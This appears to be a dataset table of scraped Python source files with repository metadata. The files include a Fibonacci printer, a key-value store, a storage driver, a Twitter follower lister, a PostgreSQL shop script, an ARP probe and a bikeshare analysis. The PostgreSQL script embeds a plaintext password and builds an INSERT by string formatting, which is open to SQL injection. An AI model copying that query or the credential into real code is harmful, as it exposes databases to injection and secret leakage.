blob_id (stringlengths 40-40) | directory_id (stringlengths 40-40) | path (stringlengths 5-261) | content_id (stringlengths 40-40) | detected_licenses (sequencelengths 0-45) | license_type (stringclasses 2) | repo_name (stringlengths 8-111) | snapshot_id (stringlengths 40-40) | revision_id (stringlengths 40-40) | branch_name (stringclasses 72) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 530k-616M, nullable) | star_events_count (int64, 0-102k) | fork_events_count (int64, 0-24.6k) | gha_license_id (stringclasses 9) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (stringclasses 40) | src_encoding (stringclasses 10) | language (stringclasses 1) | is_vendor (bool, 1 class) | is_generated (bool, 2 classes) | length_bytes (int64, 11-4.05M) | extension (stringclasses 25) | content (stringlengths 10-4.04M) | authors (sequencelengths 1-1) | author_id (stringclasses 578) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1b1d43ac638223550a5a9f28cb4d5f216a837cbf | 1fac53ab13a9a682ecd926857ef565fa779afae4 | /fbseries.py | 44da677508725917468869fb71285e9ed733a195 | [] | no_license | Shamabanu/python-1 | 339123ff4e7667d6331c207cb1c7ca3fc775dc48 | 4c1642679bb0bdd53a1d21e5421e04eb7abda65b | refs/heads/master | 2020-04-13T23:49:27.700807 | 2018-12-29T15:10:26 | 2018-12-29T15:10:26 | 163,516,492 | 1 | 0 | null | 2018-12-29T14:16:28 | 2018-12-29T14:16:28 | null | UTF-8 | Python | false | false | 219 | py | def fibonacci(n):
    if n <= 1:
        return n
    else:
        return fibonacci(n - 1) + fibonacci(n - 2)

n = int(input("Enter no of terms: "))
print("Fibonacci sequence:")
for i in range(n):
    print(fibonacci(i))
| [
"[email protected]"
] | |
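The recursive fibonacci above recomputes the same subproblems exponentially many times. A minimal memoized sketch of the same function, using only the standard library (the function name matches the file's; behaviour is otherwise unchanged):

from functools import lru_cache

@lru_cache(maxsize=None)
def fibonacci(n):
    # same base case and recurrence as above, but results are cached
    if n <= 1:
        return n
    return fibonacci(n - 1) + fibonacci(n - 2)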
ceb00ada558194b136dbe08db9825882d460d300 | 577341517a9aa9f94afac9c9b1ca5efbf39bbf02 | /initial.py | 2a5e707232a35b2fd7bdce64b724911033252ff2 | [] | no_license | prathyu0398/Freshworks_assignment | 7276dde9aabb9536aa519fd7c861cd133c577f92 | 02cf03ae47ef2ab7d6aa7e7aa72533e46a1da100 | refs/heads/main | 2023-01-29T03:00:13.984100 | 2020-12-01T08:07:18 | 2020-12-01T08:07:18 | 317,468,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,852 | py | import threading
import time
import json
#https://github.com/sriharsha9598/CRD-operations-of-a-file-based-key-value-data-store
f=open("data.json",)
d=json.load(f)
def create(key, value, timeout=0):
if key in d:
print("error: this key already exists") # error message1
else:
if (key.isalpha()):
            if len(d) < (1024 * 1024 * 1024) and value <= (
                    16 * 1024 * 1024):  # store capped at 1 GB, values at 16 MB
if timeout == 0:
l = [value, timeout]
else:
l = [value, time.time() + timeout]
if len(key) <= 32: # constraints for input key_name capped at 32chars
d[key] = l
else:
print("Error: Memory limit exceeded!! ") # error message2
else:
            print(
                "Error: Invalid key_name!! key_name must contain only alphabets and no special characters or numbers")  # error message3
def read(key):
if key not in d:
print("Error: given key does not exist in database. Please enter a valid key") # error message4
else:
b = d[key]
if b[1] != 0:
if time.time() < b[1]:
stri = str(key) + ":" + str(
b[0])
return stri
else:
print("Error: time-to-live of", key, "has expired") # error message5
else:
stri = str(key) + ":" + str(b[0])
return stri
def delete(key):
if key not in d:
print("Error: Given key does not exist in database. Please enter a valid key") # error message4
else:
b = d[key]
if b[1] != 0:
if time.time() < b[1]: # comparing the current time with expiry time
del d[key]
print("key is successfully deleted")
else:
print("error: time-to-live of", key, "has expired") # error message5
else:
del d[key]
print("key is successfully deleted")
def modify(key, value):
    if key not in d:
        print("error: given key does not exist in database. Please enter a valid key")  # error message6
        return
    b = d[key]
    if b[1] != 0 and time.time() >= b[1]:  # the key had a TTL and it has expired
        print("error: time-to-live of", key, "has expired")  # error message5
        return
    d[key] = [value, b[1]]  # keep the original expiry, replace the value
| [
"[email protected]"
] | |
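A minimal usage sketch for the key-value helpers above, assuming a data.json file containing an empty JSON object ({}) sits next to the script; the sample keys and values are illustrative:

create("apple", 100)        # stored with no expiry
create("banana", 50, 10)    # expires 10 seconds after creation
print(read("apple"))        # -> "apple:100"
modify("apple", 120)        # keeps the original expiry, swaps the value
delete_item("banana")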
c1dc9b8de82a537e52ed23b956fe00cfff4c98ee | 2db67c3d6d4ec252f3e76ce6e92f258c4e1fbf73 | /delfin/drivers/dell_emc/unity/unity.py | 7652a09592639cd3844daf83fc8c520d00d832a2 | [
"Apache-2.0"
] | permissive | jiangyutan/delfin | 2b74ed2473f2e42f8cc1d185a8ac4c0835035bd0 | d63b5f19efabc1c6ef94f0244e9f89c2ecceb7ed | refs/heads/v0.8.0-maint | 2023-05-04T21:18:08.539343 | 2021-03-15T08:00:53 | 2021-03-15T08:00:53 | 286,358,774 | 0 | 0 | Apache-2.0 | 2020-08-10T02:38:37 | 2020-08-10T02:38:36 | null | UTF-8 | Python | false | false | 8,054 | py | # Copyright 2020 The SODA Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log
from delfin.common import constants
from delfin.drivers import driver
from delfin.drivers.dell_emc.unity import rest_handler, alert_handler, consts
from delfin.drivers.dell_emc.unity.alert_handler import AlertHandler
LOG = log.getLogger(__name__)
class UNITYStorDriver(driver.StorageDriver):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.rest_handler = rest_handler.RestHandler(**kwargs)
self.rest_handler.login()
def reset_connection(self, context, **kwargs):
self.rest_handler.logout()
self.rest_handler.verify = kwargs.get('verify', False)
self.rest_handler.login()
def close_connection(self):
self.rest_handler.logout()
def get_storage(self, context):
system_info = self.rest_handler.get_storage()
capacity = self.rest_handler.get_capacity()
version_info = self.rest_handler.get_soft_version()
disk_info = self.rest_handler.get_disk_info()
status = constants.StorageStatus.OFFLINE
if system_info is not None and capacity is not None:
system_entries = system_info.get('entries')
for system in system_entries:
name = system.get('content').get('name')
model = system.get('content').get('model')
serial_number = system.get('content').get('serialNumber')
health_value = system.get('content').get('health').get('value')
if health_value in consts.HEALTH_OK:
status = constants.StorageStatus.NORMAL
else:
status = constants.StorageStatus.ABNORMAL
break
capacity_info = capacity.get('entries')
for per_capacity in capacity_info:
free = per_capacity.get('content').get('sizeFree')
total = per_capacity.get('content').get('sizeTotal')
used = per_capacity.get('content').get('sizeUsed')
subs = per_capacity.get('content').get('sizeSubscribed')
break
soft_version = version_info.get('entries')
for soft_info in soft_version:
version = soft_info.get('content').get('id')
break
disk_entrier = disk_info.get('entries')
raw = 0
for disk in disk_entrier:
raw = raw + int(disk.get('content').get('rawSize'))
result = {
'name': name,
'vendor': 'DELL EMC',
'model': model,
'status': status,
'serial_number': serial_number,
'firmware_version': version,
'location': '',
'subscribed_capacity': int(subs),
'total_capacity': int(total),
'raw_capacity': int(raw),
'used_capacity': int(used),
'free_capacity': int(free)
}
return result
def list_storage_pools(self, context):
pool_info = self.rest_handler.get_all_pools()
pool_list = []
pool_type = constants.StorageType.BLOCK
if pool_info is not None:
pool_entries = pool_info.get('entries')
for pool in pool_entries:
health_value = pool.get('content').get('health').get('value')
if health_value in consts.HEALTH_OK:
status = constants.StorageStatus.NORMAL
else:
status = constants.StorageStatus.ABNORMAL
p = {
'name': pool.get('content').get('name'),
'storage_id': self.storage_id,
'native_storage_pool_id': str(
pool.get('content').get('id')),
'description': pool.get('content').get('description'),
'status': status,
'storage_type': pool_type,
'total_capacity': int(pool.get('content').
get('sizeTotal')),
'subscribed_capacity': int(pool.get('content').get(
'sizeSubscribed')),
'used_capacity': int(pool.get('content').get('sizeUsed')),
'free_capacity': int(pool.get('content').get('sizeFree'))
}
pool_list.append(p)
return pool_list
def volume_handler(self, volumes, volume_list):
if volumes is not None:
vol_entries = volumes.get('entries')
for volume in vol_entries:
total = volume.get('content').get('sizeTotal')
used = volume.get('content').get('sizeAllocated')
vol_type = constants.VolumeType.THICK
if volume.get('content').get('isThinEnabled') is True:
vol_type = constants.VolumeType.THIN
compressed = True
deduplicated = volume.get('content').\
get('isAdvancedDedupEnabled')
health_value = volume.get('content').get('health').get('value')
if health_value in consts.HEALTH_OK:
status = constants.StorageStatus.NORMAL
else:
status = constants.StorageStatus.ABNORMAL
v = {
'name': volume.get('content').get('name'),
'storage_id': self.storage_id,
'description': volume.get('content').get('description'),
'status': status,
'native_volume_id': str(volume.get('content').get('id')),
'native_storage_pool_id':
volume.get('content').get('pool').get('id'),
'wwn': volume.get('content').get('wwn'),
'type': vol_type,
'total_capacity': int(total),
'used_capacity': int(used),
'free_capacity': int(total - used),
'compressed': compressed,
'deduplicated': deduplicated
}
volume_list.append(v)
    def list_volumes(self, context):
        page_number = 1  # page index passed to the REST handler, not a size
        volume_list = []
        while True:
            luns = self.rest_handler.get_all_luns(page_number)
            if 'entries' not in luns:
                break
            if len(luns['entries']) < 1:
                break
            self.volume_handler(luns, volume_list)
            page_number = page_number + 1
        return volume_list
    def list_alerts(self, context, query_para=None):
        page_number = 1  # page index passed to the REST handler, not a size
        alert_model_list = []
        while True:
            alert_list = self.rest_handler.get_all_alerts(page_number)
            if 'entries' not in alert_list:
                break
            if len(alert_list['entries']) < 1:
                break
            alert_handler.AlertHandler() \
                .parse_queried_alerts(alert_model_list, alert_list, query_para)
            page_number = page_number + 1
        return alert_model_list
def add_trap_config(self, context, trap_config):
pass
def remove_trap_config(self, context, trap_config):
pass
@staticmethod
def parse_alert(context, alert):
return AlertHandler.parse_alert(context, alert)
def clear_alert(self, context, alert):
return self.rest_handler.remove_alert(context, alert)
| [
"[email protected]"
] | |
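The two paginated readers above (list_volumes and list_alerts) share the same loop shape. A small generic helper, hypothetical and not part of the delfin driver API, makes the pattern explicit:

def iterate_pages(fetch_page, handle_entries):
    # fetch_page(page_number) must return a dict with an 'entries' list;
    # iteration stops at the first page that has no entries.
    page_number = 1
    while True:
        result = fetch_page(page_number)
        if 'entries' not in result or len(result['entries']) < 1:
            break
        handle_entries(result)
        page_number += 1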
c025936563a10774a9b3acd93602aa92bf3b75f8 | 2b7dccfa789bdeff28f306243f5ee04137e131be | /PythonAndCoding/tweettweet.py | ad177cc437e3640df20a5dee289e4f0e18627984 | [] | no_license | animeshsrivastava246/PythonWork | d3a88a65bbf50da3ffb9912ab18dd0126e502c8e | 3bdee1f06fd7faf92b02c37f3361e7e92011c57b | refs/heads/main | 2023-07-13T12:17:05.083860 | 2021-08-16T11:30:42 | 2021-08-16T11:30:42 | 396,763,690 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | import tweepy,time
# consumer_key, consumer_secret, access_token and access_token_secret must be
# defined with your own Twitter API credentials before these lines will run.
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
user=api.me()
def limit_handler(cursor):
try:
while True:
yield cursor.next()
except tweepy.RateLimitError:
        time.sleep(300)  # seconds: back off about five minutes when the rate limit is hit
for follower in limit_handler(tweepy.Cursor(api.followers).items()):
print(follower.name)
#print(user.followers_count)
#print(user.screen_name)
#print(user.name)
#public_tweets = api.home_timeline()
#for tweet in public_tweets:
# print(tweet.text)
# Tweepy.org DOCUMENTATION | [
"[email protected]"
] | |
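The except clause above targets tweepy's pre-4.0 exception name. A version-tolerant sketch of the same handler (assumption: tweepy 4 renamed RateLimitError to TooManyRequests, so only these two names need covering):

try:
    RateLimitHit = tweepy.TooManyRequests   # tweepy >= 4.0
except AttributeError:
    RateLimitHit = tweepy.RateLimitError    # tweepy < 4.0

def limit_handler(cursor):
    try:
        while True:
            yield cursor.next()
    except RateLimitHit:
        time.sleep(300)  # back off about five minutes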
27b994c3924007d90e49e4fc1c92fc4eef573a45 | 5bc7733ecb92e5c426ba3ff620ffba8da27292f6 | /postGRE_script.py | 08ac3a51cf487cea29986395757646fbbea6f9ed | [] | no_license | CodeyBank/simple-database-using-postgres | 66ac01bfed27ad8b4047bc081c909c22b66bab53 | 29c0ab25cbef664621d84cc659818dfdc720046b | refs/heads/main | 2023-05-19T16:47:53.768820 | 2021-06-05T18:47:08 | 2021-06-05T18:47:08 | 374,189,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | import psycopg2
def create_table():
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS store (item TEXT, quantity INTEGER, price REAL)")
connection.commit()
connection.close()
def insert(item, quantity, price):
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("INSERT INTO store VALUES('%s', '%s', '%s')" %(item, quantity, price))
#cur.execute("INSERT INTO store VALUES(%s, %s, %s)", (item, quantity, price)) #Alternative method to avoid database injections from hackers
connection.commit()
connection.close()
#insert("Coffee cup", 10, 2.5)
# This function deletes a row. pass the row item as an argument
def delete_item(item):
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("DELETE FROM store WHERE item=%s", (item,)) #when there is only one parameter, always end with ','
connection.commit()
connection.close()
def view_db():
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("SELECT * FROM store")
    rows = cur.fetchall()  # fetchall() returns the rows of the table as a list of tuples
connection.close()
return rows
def update_db(quantity, price, item):
    connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
    cur = connection.cursor()
    cur.execute("UPDATE store SET quantity=%s, price=%s WHERE item=%s", (quantity, price, item))
    connection.commit()  # UPDATE returns no result set, so commit the change instead of calling fetchall()
    connection.close()
create_table()
delete_item("Orange")
print(view_db()) | [
"[email protected]"
] | |
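Each helper above opens and closes its own connection. A sketch of insert() using psycopg2's context-manager support, with the same DSN the script already uses; note that psycopg2's 'with connection' commits or rolls back the transaction but does not close the connection itself:

def insert(item, quantity, price):
    with psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'") as connection:
        with connection.cursor() as cur:
            cur.execute("INSERT INTO store VALUES (%s, %s, %s)", (item, quantity, price))
    connection.close()  # close explicitly; the with-block only ends the transaction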
10320c2b5c5d228ae3ada19ae71d1c1b9d7fff71 | 77d7f2c1284b276c95ad31b15ac2bde077f1ceca | /fastreid/data/common.py | 959fefb3f17b62bcdefa3071913ff3df58331735 | [
"Apache-2.0"
] | permissive | Cris-zj/fast-reid | a53f19fefe149eec93d0f1b2a1d61136d9c9eaf6 | db4b65444912cfd54675e6a52fa12e2d1321e971 | refs/heads/master | 2022-12-14T15:23:40.820118 | 2020-08-31T12:34:33 | 2020-08-31T12:34:33 | 291,639,026 | 2 | 0 | Apache-2.0 | 2020-08-31T06:56:24 | 2020-08-31T06:56:23 | null | UTF-8 | Python | false | false | 1,078 | py | # encoding: utf-8
"""
@author: liaoxingyu
@contact: [email protected]
"""
from torch.utils.data import Dataset
from .data_utils import read_image
class CommDataset(Dataset):
"""Image Person ReID Dataset"""
def __init__(self, img_items, transform=None, relabel=True):
self.img_items = img_items
self.transform = transform
self.relabel = relabel
pid_set = set([i[1] for i in img_items])
self.pids = sorted(list(pid_set))
if relabel: self.pid_dict = dict([(p, i) for i, p in enumerate(self.pids)])
def __len__(self):
return len(self.img_items)
def __getitem__(self, index):
img_path, pid, camid = self.img_items[index]
img = read_image(img_path)
if self.transform is not None: img = self.transform(img)
if self.relabel: pid = self.pid_dict[pid]
return {
"images": img,
"targets": pid,
"camid": camid,
"img_path": img_path
}
@property
def num_classes(self):
return len(self.pids)
| [
"[email protected]"
] | |
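A short usage sketch for CommDataset (paths, person ids and camera ids are illustrative; read_image and any transforms come from the surrounding fastreid package):

items = [("data/0001_c1.jpg", "0001", 0),
         ("data/0002_c2.jpg", "0002", 1)]
dataset = CommDataset(items, transform=None, relabel=True)
print(len(dataset), dataset.num_classes)   # 2 2
# dataset[0] would read the image from disk and return
# {'images': ..., 'targets': 0, 'camid': 0, 'img_path': 'data/0001_c1.jpg'}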
37857bc4bb9559c9e3f68635744baf75a7cc8762 | c086a38a366b0724d7339ae94d6bfb489413d2f4 | /PythonEnv/Lib/site-packages/docutils/utils/urischemes.py | 01335601af86e67266b95a75aa5f0935ea92bcf5 | [] | no_license | FlowkoHinti/Dionysos | 2dc06651a4fc9b4c8c90d264b2f820f34d736650 | d9f8fbf3bb0713527dc33383a7f3e135b2041638 | refs/heads/master | 2021-03-02T01:14:18.622703 | 2020-06-09T08:28:44 | 2020-06-09T08:28:44 | 245,826,041 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,028 | py | # $Id: urischemes.py 8376 2019-08-27 19:49:29Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
`schemes` is a dictionary with lowercase URI addressing schemes as
keys and descriptions as values. It was compiled from the index at
http://www.iana.org/assignments/uri-schemes (revised 2005-11-28)
and an older list at http://www.w3.org/Addressing/schemes.html.
"""
# Many values are blank and should be filled in with useful descriptions.
schemes = {
'about': 'provides information on Navigator',
'acap': 'Application Configuration Access Protocol; RFC 2244',
'addbook': "To add vCard entries to Communicator's Address Book",
'afp': 'Apple Filing Protocol',
'afs': 'Andrew File System global file names',
'aim': 'AOL Instant Messenger',
'callto': 'for NetMeeting links',
'castanet': 'Castanet Tuner URLs for Netcaster',
'chttp': 'cached HTTP supported by RealPlayer',
'cid': 'content identifier; RFC 2392',
'crid': 'TV-Anytime Content Reference Identifier; RFC 4078',
'data': ('allows inclusion of small data items as "immediate" data; '
'RFC 2397'),
'dav': 'Distributed Authoring and Versioning Protocol; RFC 2518',
'dict': 'dictionary service protocol; RFC 2229',
'dns': 'Domain Name System resources',
'eid': ('External ID; non-URL data; general escape mechanism to allow '
'access to information for applications that are too '
'specialized to justify their own schemes'),
'fax': ('a connection to a terminal that can handle telefaxes '
'(facsimiles); RFC 2806'),
'feed': 'NetNewsWire feed',
'file': 'Host-specific file names; RFC 1738',
'finger': '',
'freenet': '',
'ftp': 'File Transfer Protocol; RFC 1738',
'go': 'go; RFC 3368',
'gopher': 'The Gopher Protocol',
'gsm-sms': ('Global System for Mobile Communications Short Message '
'Service'),
'h323': ('video (audiovisual) communication on local area networks; '
'RFC 3508'),
'h324': ('video and audio communications over low bitrate connections '
'such as POTS modem connections'),
'hdl': 'CNRI handle system',
'hnews': 'an HTTP-tunneling variant of the NNTP news protocol',
'http': 'Hypertext Transfer Protocol; RFC 2616',
'https': 'HTTP over SSL; RFC 2818',
'hydra': 'SubEthaEdit URI. See http://www.codingmonkeys.de/subethaedit.',
'iioploc': 'Internet Inter-ORB Protocol Location?',
'ilu': 'Inter-Language Unification',
'im': 'Instant Messaging; RFC 3860',
'imap': 'Internet Message Access Protocol; RFC 2192',
'info': 'Information Assets with Identifiers in Public Namespaces',
'ior': 'CORBA interoperable object reference',
'ipp': 'Internet Printing Protocol; RFC 3510',
'irc': 'Internet Relay Chat',
'iris.beep': 'iris.beep; RFC 3983',
'iseek': 'See www.ambrosiasw.com; a little util for OS X.',
'jar': 'Java archive',
'javascript': ('JavaScript code; evaluates the expression after the '
'colon'),
'jdbc': 'JDBC connection URI.',
'ldap': 'Lightweight Directory Access Protocol',
'lifn': '',
'livescript': '',
'lrq': '',
'mailbox': 'Mail folder access',
'mailserver': 'Access to data available from mail servers',
'mailto': 'Electronic mail address; RFC 2368',
'md5': '',
'mid': 'message identifier; RFC 2392',
'mocha': '',
'modem': ('a connection to a terminal that can handle incoming data '
'calls; RFC 2806'),
'mtqp': 'Message Tracking Query Protocol; RFC 3887',
'mupdate': 'Mailbox Update (MUPDATE) Protocol; RFC 3656',
'news': 'USENET news; RFC 1738',
'nfs': 'Network File System protocol; RFC 2224',
'nntp': 'USENET news using NNTP access; RFC 1738',
'opaquelocktoken': 'RFC 2518',
'phone': '',
'pop': 'Post Office Protocol; RFC 2384',
'pop3': 'Post Office Protocol v3',
'pres': 'Presence; RFC 3859',
'printer': '',
'prospero': 'Prospero Directory Service; RFC 4157',
'rdar': ('URLs found in Darwin source '
'(http://www.opensource.apple.com/darwinsource/).'),
'res': '',
'rtsp': 'real time streaming protocol; RFC 2326',
'rvp': '',
'rwhois': '',
'rx': 'Remote Execution',
'sdp': '',
'service': 'service location; RFC 2609',
'shttp': 'secure hypertext transfer protocol',
'sip': 'Session Initiation Protocol; RFC 3261',
    'sips': 'secure session initiation protocol; RFC 3261',
'smb': 'SAMBA filesystems.',
'snews': 'For NNTP postings via SSL',
'snmp': 'Simple Network Management Protocol; RFC 4088',
'soap.beep': 'RFC 3288',
'soap.beeps': 'RFC 3288',
'ssh': 'Reference to interactive sessions via ssh.',
't120': 'real time data conferencing (audiographics)',
'tag': 'RFC 4151',
'tcp': '',
'tel': ('a connection to a terminal that handles normal voice '
'telephone calls, a voice mailbox or another voice messaging '
'system or a service that can be operated using DTMF tones; '
'RFC 3966.'),
'telephone': 'telephone',
'telnet': 'Reference to interactive sessions; RFC 4248',
'tftp': 'Trivial File Transfer Protocol; RFC 3617',
'tip': 'Transaction Internet Protocol; RFC 2371',
'tn3270': 'Interactive 3270 emulation sessions',
'tv': '',
'urn': 'Uniform Resource Name; RFC 2141',
'uuid': '',
'vemmi': 'versatile multimedia interface; RFC 2122',
'videotex': '',
'view-source': 'displays HTML code that was generated with JavaScript',
'wais': 'Wide Area Information Servers; RFC 4156',
'whodp': '',
'whois++': 'Distributed directory service.',
'x-man-page': ('Opens man page in Terminal.app on OS X '
'(see macosxhints.com)'),
'xmlrpc.beep': 'RFC 3529',
'xmlrpc.beeps': 'RFC 3529',
'z39.50r': 'Z39.50 Retrieval; RFC 2056',
'z39.50s': 'Z39.50 Session; RFC 2056', }
| [
"="
] | = |
d7a475241f3c8632512754d85bd07dc6b8525b48 | 6b5142b5def59556942f91411a792ac5d15fc427 | /l2tshoot.py | 7ae899cee162ca115d4f8d2adc564046b703a3f2 | [] | no_license | karthiksjsu/codedump | 2a9c9ee4f75deba0b8cc8f460afd3b85f1ff239a | ac94fc8a259023ba804c0e587f72a9dfed89bbd6 | refs/heads/master | 2021-01-19T17:02:36.274907 | 2017-04-14T21:14:14 | 2017-04-14T21:14:14 | 88,301,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 627 | py | import logging
logging.getLogger("scapy runtime").setLevel(logging.ERROR)
from scapy.all import *
dstip=raw_input("Enter the IP for which the status needs to be checked\n")
logging.info("constructing ARP message")
arp=ARP()
arp.hwdst='00:00:00:00:00:00'
arp.hwsrc='08:00:27:dd:f5:3a'
arp.pdst=dstip
arp.psrc='10.0.2.15'  # sender protocol address; the ARP layer has no plain 'src' field
ether=Ether()
ether.dst='FF:FF:FF:FF:FF:FF'
ether.src='08:00:27:dd:f5:3a'
packet=ether/arp
reply=srp1(packet,timeout=5,verbose=0)
if(reply):
print "Layer2 status is up and at " +reply.src
#print reply.show()
else:
print "Layer2 status is down"
logging.warning(" Status is down")
| [
"[email protected]"
] | |
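A variant sketch that derives the local MAC address from scapy instead of hard-coding it (assumes the default interface is the one to probe from; field names follow scapy's ARP layer):

from scapy.all import ARP, Ether, srp1, get_if_hwaddr, conf

iface = conf.iface
my_mac = get_if_hwaddr(iface)
packet = Ether(dst='ff:ff:ff:ff:ff:ff', src=my_mac) / ARP(hwsrc=my_mac, pdst=dstip)
reply = srp1(packet, timeout=5, verbose=0, iface=iface)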
cc35858bc95f4683d14d95919f9519628e61c9bc | 79067556d586128deadc846098010059d20f60e2 | /bikeshare.py | becb19cf9c26bfd2ec8cc95528a0b9e8cfc5025b | [] | no_license | mohamedkhnour/Explore-US-Bikeshare-Data | 656fe2f1bf39e9ea1aceefbc2c792940c0a69b8d | 87ca4bf6fba60cfbdf86653614ad85a00f40ffdb | refs/heads/main | 2023-04-08T16:15:10.654637 | 2021-04-15T20:11:38 | 2021-04-15T20:11:38 | 358,376,362 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,834 | py | import time
import pandas as pd
import numpy as np
CITY_DATA = { 'ch': 'chicago.csv',
'ny': 'new_york_city.csv',
'w': 'washington.csv' }
def get_filters():
# TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs
    city_selection = input('To view available BS data, kindly type: \n The letter (ch) for Chicago \n The letter (ny) for New York City \n The letter (w) for Washington \n').lower()
    while city_selection not in {'ch', 'ny', 'w'}:
        print('That is invalid input.')
        city_selection = input('To view available BS data, kindly type: \n The letter (ch) for Chicago \n The letter (ny) for New York City \n The letter (w) for Washington \n').lower()
# TO DO: get user input for month (all, january, february, ... , june)
    months = ['january', 'february', 'march', 'april', 'may', 'june', 'all']
    month_selection = input('Select month \n January \n February \n March \n April \n May \n June \n ALL \n').lower()
    while month_selection not in months:
        print('That is invalid input.')
        month_selection = input('Select month \n January \n February \n March \n April \n May \n June \n ALL \n').lower()
# TO DO: get user input for day of week (all, monday, tuesday, ... sunday)
    days = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']
    day_selection = input('Select day \n Monday \n Tuesday \n Wednesday \n Thursday \n Friday \n Saturday \n Sunday \n ALL \n').lower()
    while day_selection not in days:
        print('That is invalid input.')
        day_selection = input('Select day \n Monday \n Tuesday \n Wednesday \n Thursday \n Friday \n Saturday \n Sunday \n ALL \n').lower()
print('-'*40)
return city_selection, month_selection, day_selection
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
# load data file into a dataframe
df = pd.read_csv(CITY_DATA[city])
# convert the Start Time column to datetime
df['Start Time'] = pd.to_datetime(df['Start Time'])
# extract month and day of week from Start Time to create new columns
df['month'] = df['Start Time'].dt.month
    df['day_of_week'] = df['Start Time'].dt.day_name()  # weekday_name was removed in newer pandas
# filter by month if applicable
if month != 'all':
# use the index of the months list to get the corresponding int
months = ['january', 'february', 'march', 'april', 'may', 'june']
month = months.index(month) + 1
# filter by month to create the new dataframe
df = df[df['month'] == month]
# filter by day of week if applicable
if day != 'all':
# filter by day of week to create the new dataframe
        df = df[df['day_of_week'] == day.title()]

    return df
def time_stats(df1):
"""Displays statistics on the most frequent times of travel."""
df = df1
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
df['Start Time'] = pd.to_datetime(df['Start Time'])
# TO DO: display the most common month
df['month'] = df['Start Time'].dt.month
popular_month = df['month'].mode()[0]
print('Most Popular Start month:', popular_month)
# TO DO: display the most common day of week
df['day'] = df['Start Time'].dt.dayofweek
popular_day = df['day'].mode()[0]
    print('Most Popular Start Day:', popular_day)
# TO DO: display the most common start hour
df['hour'] = df['Start Time'].dt.hour
popular_hour = df['hour'].mode()[0]
print('Most Popular Start Hour:', popular_hour)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
return(time.time() - start_time)
def station_stats(df1):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
df = df1
# TO DO: display most commonly used start station
common_start_station = df['Start Station'].mode()[0]
print("The most start station from data is: " + common_start_station)
# TO DO: display most commonly used end station
common_end_station = df['End Station'].mode()[0]
print("The most end station is: " + common_end_station)
# TO DO: display most frequent combination of start station and end station trip
frequent_combination = (df['Start Station'] + "||" + df['End Station']).mode()[0]
print("The moststart station and end station trip is : " + str(frequent_combination.split("||")))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(df):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# TO DO: display total travel time
    total_travel_time = df['Trip Duration'].sum()
    print("The total travel time from the given filtered data is: " + str(total_travel_time))
    # TO DO: display mean travel time
    mean_travel_time = df['Trip Duration'].mean()
    print("The mean travel time from the given filtered data is: " + str(mean_travel_time))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def user_stats(df):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
    # TO DO: Display counts of user types
    user_types = df['User Type'].value_counts()
    print("The count of user types from the given filtered data is: \n" + str(user_types))
    # TO DO: Display counts of gender
    gender = df['Gender'].value_counts()
    print("The count of user gender from the given filtered data is: \n" + str(gender))
    # TO DO: Display earliest, most recent, and most common year of birth
    earliest_birth = df['Birth Year'].min()
    most_recent_birth = df['Birth Year'].max()
    most_common_birth = df['Birth Year'].mode()[0]
    print('Earliest birth from the given filtered data is: {}\n'.format(earliest_birth))
    print('Most recent birth from the given filtered data is: {}\n'.format(most_recent_birth))
    print('Most common birth from the given filtered data is: {}\n'.format(most_common_birth))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
'''def main():
city,month,day=get_filters()
df=load_data(city,month,day)
#print(df.head())
time_stats(df)
station_stats(df)
trip_duration_stats(df)
if city=='ch':
user_stats(df)'''
def display_raw_data(df):
print(df.head())
